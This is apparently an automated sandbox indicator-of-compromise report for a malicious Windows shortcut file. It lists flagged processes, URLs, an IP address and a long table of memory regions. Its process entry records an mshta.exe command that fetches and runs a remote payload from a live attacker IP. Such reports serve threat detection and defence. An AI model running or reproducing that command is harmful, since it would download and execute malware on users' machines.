IOC Report
3d#U044f.lnk

loading gif

Processes

Path
Cmdline
Malicious
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" http://194.180.191.34/pr/relationship.tmp /f
malicious

URLs

Name
IP
Malicious
http://194.180.191.34/pr/relationship.tmp
194.180.191.34
malicious
http://194.180.191.34/pr/relationship.tmp1
unknown
http://194.180.191.34/pr/relationship.tmpq
unknown
http://194.180.191.34/pr/relationship.tmpndowsINetCookies
unknown
http://194.180.191.34/pr/relationship.tmp%
unknown
http://194.180.191.34/pr/relationship.tmpE
unknown
http://194.180.191.34/pr/relationship.tmp/fternet
unknown
http://194.180.191.34/pr/relationship.tmpy
unknown
http://194.180.191.34/pr/relationship.tmpvJ
unknown
http://194.180.191.34/pr/relationship.tmp...
unknown
http://194.180.191.34/pr/relationship.tmpC:
unknown
There are 1 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
194.180.191.34
unknown
unknown
malicious

Memdumps

Base Address
Regiontype
Protect
Malicious
13F5117F000
heap
page read and write
13F55906000
heap
page read and write
9360FB000
stack
page read and write
13F50614000
trusted library allocation
page read and write
13750020000
heap
page read and write
13F51174000
heap
page read and write
13F51171000
heap
page read and write
13F50630000
trusted library allocation
page read and write
13F51175000
heap
page read and write
13F55B03000
trusted library allocation
page read and write
13F51260000
heap
page read and write
13750039000
heap
page read and write
13F50600000
trusted library allocation
page read and write
1375003E000
heap
page read and write
13750042000
heap
page read and write
13F51125000
heap
page read and write
1374E875000
heap
page read and write
13F51171000
heap
page read and write
1374E800000
trusted library allocation
page read and write
13F512C1000
heap
page read and write
1374E6D4000
trusted library allocation
page read and write
13F505B0000
trusted library allocation
page read and write
13F505F0000
trusted library allocation
page read and write
1374E590000
heap
page read and write
935CFF000
stack
page read and write
13F51275000
heap
page read and write
9358FB000
stack
page read and write
13F50630000
trusted library allocation
page read and write
13F51110000
heap
page read and write
13F50714000
heap
page read and write
13F5133B000
heap
page read and write
13F558E0000
trusted library allocation
page read and write
13F50630000
trusted library allocation
page read and write
13F505C4000
trusted library allocation
page read and write
13F505C9000
trusted library allocation
page read and write
1374E7B1000
heap
page read and write
13F50590000
trusted library allocation
page read and write
1374E768000
heap
page read and write
9359FE000
stack
page read and write
13F51169000
heap
page read and write
13F51297000
heap
page read and write
13F50578000
trusted library allocation
page read and write
1374E87E000
heap
page read and write
935DFE000
stack
page read and write
13F5118B000
heap
page read and write
13F50608000
trusted library allocation
page read and write
1374E716000
heap
page read and write
13F5128A000
heap
page read and write
13F51171000
heap
page read and write
935BFE000
stack
page read and write
1374E7F0000
trusted library allocation
page read and write
7DF4FA281000
trusted library allocation
page execute read
13750024000
heap
page read and write
13F51171000
heap
page read and write
13F505E8000
trusted library allocation
page read and write
13F512B1000
heap
page read and write
13750046000
heap
page read and write
935FFE000
stack
page read and write
1374E870000
heap
page read and write
13F558E0000
trusted library allocation
page read and write
13F50610000
trusted library allocation
page read and write
13F51272000
heap
page read and write
13F51284000
heap
page read and write
935326000
stack
page read and write
13F512AB000
heap
page read and write
1374E753000
heap
page read and write
13F54D72000
trusted library allocation
page read and write
1374E6FE000
heap
page read and write
13F51169000
heap
page read and write
1374E830000
heap
page read and write
13F558F0000
heap
page readonly
1374E670000
heap
page read and write
1374E7CD000
heap
page read and write
13F51264000
heap
page read and write
13F55680000
heap
page read and write
13F53390000
trusted library section
page readonly
1374E79C000
heap
page read and write
1374E6F8000
heap
page read and write
13F55957000
heap
page read and write
13F51175000
heap
page read and write
13F51336000
heap
page read and write
7DF4FA291000
trusted library allocation
page execute read
13F50910000
trusted library allocation
page read and write
13F50588000
trusted library allocation
page read and write
13F505E0000
trusted library allocation
page read and write
13F5060C000
trusted library allocation
page read and write
1374E690000
heap
page read and write
13F50618000
trusted library allocation
page read and write
1374E7B6000
heap
page read and write
13750170000
heap
page read and write
13F5118A000
heap
page read and write
13F50620000
trusted library allocation
page read and write
13F50624000
trusted library allocation
page read and write
13F5127D000
heap
page read and write
1374E7D0000
heap
page read and write
13F51288000
heap
page read and write
1374E6F0000
heap
page read and write
13F50624000
trusted library allocation
page read and write
13F505FC000
trusted library allocation
page read and write
1374E7AA000
heap
page read and write
13F51282000
heap
page read and write
13F50560000
heap
page read and write
7DF4FA280000
trusted library allocation
page readonly
935EFE000
stack
page read and write
13F51169000
heap
page read and write
13F51268000
heap
page read and write
13F5116A000
heap
page read and write
13F55954000
heap
page read and write
13F512BD000
heap
page read and write
13F505D0000
trusted library allocation
page read and write
13F50710000
heap
page read and write
13F55B00000
trusted library allocation
page read and write
13750174000
heap
page read and write
13F51286000
heap
page read and write
13F50620000
trusted library allocation
page read and write
13F505F8000
trusted library allocation
page read and write
13F5115F000
heap
page read and write
13F51145000
heap
page read and write
93537F000
stack
page read and write
1374E7DB000
heap
page read and write
13F55900000
heap
page read and write
13F51158000
heap
page read and write
13F55B10000
trusted library allocation
page read and write
13F505D8000
trusted library allocation
page read and write
1375017D000
heap
page read and write
13F55920000
heap
page read and write
13F51175000
heap
page read and write
There are 117 hidden memdumps, click here to show them.